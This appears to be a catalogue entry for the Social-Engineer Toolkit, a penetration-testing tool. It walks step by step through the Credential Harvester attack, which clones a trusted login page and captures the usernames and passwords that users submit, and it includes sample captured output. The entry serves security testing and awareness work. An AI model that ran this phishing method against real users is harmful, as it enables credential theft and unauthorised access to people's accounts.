SET

Phase(s):

Primary: Exploitation.
Secondary: N/A.

Description:

SET (Social-Engineer Toolkit) is a tool that helps exploit vulnerabilities in web applications that depend on the "human factor". It uses social engineering techniques to carry out attacks against users rather than against the software itself.

Objective:

  • Obtain confidential information from users.
  • Obtain access to the users' systems.

Features:

Supported technologies: Web applications (HTTP/HTTPS).

Operating mode: Active.

Obtain confidential information from users.

  • Provides several attack scenarios for obtaining confidential information from users, such as: Java Applet Attack Method, Metasploit Browser Exploit Method, Credential Harvester Attack Method, Tabnabbing Attack Method, Man Left in the Middle Attack Method, Web Jacking Attack Method, etc.

Obtain access to the users' systems.

  • Provides functionality to gain access to the users' systems and compromise them, for example by executing system commands or opening a back door.

Reports:
Output reports: X

Basic usage:

Create a mirror of a trusted web site in order to steal users' credentials. The following command starts the tool and displays its main menu.

./set


The main menu displays the tool's top-level options; select the first option, “Social-Engineering Attacks”.

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit


Next, select the second option, “Website Attack Vectors”.

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.


Next, select the third option, “Credential Harvester Attack Method”, to harvest user credentials submitted to a web application.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate

99) Return to Main Menu


Select the second option, “Site Cloner”, and provide the URL of the trusted web site to obtain a local mirror of it.

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu


Provide the IP address of the machine that will harvest the user credentials; the cloned login form will be rewritten to POST to this address.

set:Webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a Website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:Webattack> IP address for the POST back in Harvester/Tabnabbing: 127.0.0.1


Provide the URL of the trusted web site to be cloned.

[-] Example: http://www.thisisafakesite.com
set:Webattack> Enter the url to clone: URL_TO_CLONE


The tool then begins the cloning process.

[*] Cloning the Website: https://login.url.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a Website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80


Note: if an Apache web server is already running on port 80 of the harvesting machine, the tool asks for permission to stop it so that the cloned site can be published.

[*] Information will be displayed to you as it arrives below:
[*] Looks like the Web_server can't bind to 80. Are you running Apache?
Do you want to attempt to disable Apache? [y/n]: y
* Stopping Web server
apache2
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
... waiting
[ OK ]
[*] Successfully stopped Apache. Starting the credential harvester.
[*] Harvester is ready, have victim browse to your site.


The published “cloned” site is then available at http://IP_address/index.html. Once the process is complete, the tool logs each request made to the cloned site, for example:

USER_IP - - [14/Nov/2013 16:43:15] "GET / HTTP/1.1" 200 -


When a user accesses the “cloned” site and submits their credentials, the tool captures the request and displays the submitted fields in the terminal.

[*] WE GOT A HIT! Printing the output:
PARAM: lsd=AVpgu8gq
PARAM: display=
PARAM: enable_profile_selector=
PARAM: legacy_return=1
PARAM: profile_selector_ids=
PARAM: trynum=1
PARAM: timezone=360
PARAM: lgnrnd=144204_hbWo
PARAM: lgnjs=1384469624
POSSIBLE USERNAME FIELD FOUND: email= usuario@hotmail.com
POSSIBLE PASSWORD FIELD FOUND: pass= micontrasena12345
PARAM: persistent=1
PARAM: default_persistent=0
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.


Finally, the tool can be stopped by pressing “Ctrl+C”, which also generates the report.

Resources:

Link: https://www.trustedsec.com/downloads/social-engineer-toolkit/
Author(s): David Kennedy
Contact: irc.freenode.net, channel #setoolkit
License: BSD